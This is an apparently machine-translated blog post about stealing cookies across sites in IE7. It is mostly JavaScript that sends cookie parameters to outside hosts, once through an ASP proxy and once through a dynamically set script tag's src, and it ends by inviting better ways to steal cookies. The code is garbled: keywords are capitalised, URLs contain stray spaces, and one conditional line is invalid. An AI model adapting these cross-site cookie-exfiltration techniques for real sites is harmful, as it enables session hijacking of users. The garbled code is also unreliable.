One afternoon of study, the first challenge was ajax cross-Origin data submission, which can be solved using web Proxy. a.htm code on http: // 192.168.8.20:
<Script>
Function getXmlHttpRequest (){
If (window. ActiveXObject ){
Var ieArr = ["Msxml2.XMLHTTP", "Microsoft. XMLHTTP"];
For (var I = 0; I <ieArr. length; I ++)
{
Var xmlhttp = new ActiveXObject (ieArr [I]);
}
Return xmlhttp;
} Else if (window. XMLHttpRequest ){
Return new XMLHttpRequest ();
}
}
Var xmlHttp = getXmlHttpRequest ();
XmlHttp. Open ("get", "http: // 192.168.8.108/asp/web. asp? Url = http://8888.com/2.asp? Cookie = mmm ", true );
XmlHttp. send (null)
</Script>
Web. asp is an asp proxy.
You can directly access http: // 192.168.8.108/a.htm to send data. However, in cross-site scenarios, if we want to cross the site of 192.168.8.108, we certainly cannot put a web. asp on top, so this approach is not feasible.
In addition, iframe tags are usually used for Cross-Site cookie Stealing in other ie7.0 scenarios. If ajax is not successfully sent, another cross-site approach is found after searching, you do not need to use iframe for cross-origin submission. The Code is as follows:
<Script LANGUAGE = "Javascript" src = "" id = "get">
</Script>
<Script LANGUAGE = "Javascript">
<! --
Function get (url)
{
Var obj = document. getElementById ("get ");
Obj. src = url;
(Obj. readStatus = 200)
{
Eval (alert ("OK "));
}
}
Get ("http://jb51.net/2.asp? Cookie = 12345678 ")
/* Function query ()
{
Get ("http://jb51.net/web/1.img"); // code can be written here, like replacing OK in alert ("OK") with a variable, the code in 1.img is var OK = "123"
}
// -->
*/
</Script>
For other better methods, we are welcome to discuss how to steal cookies through ajax cross-origin in IE7.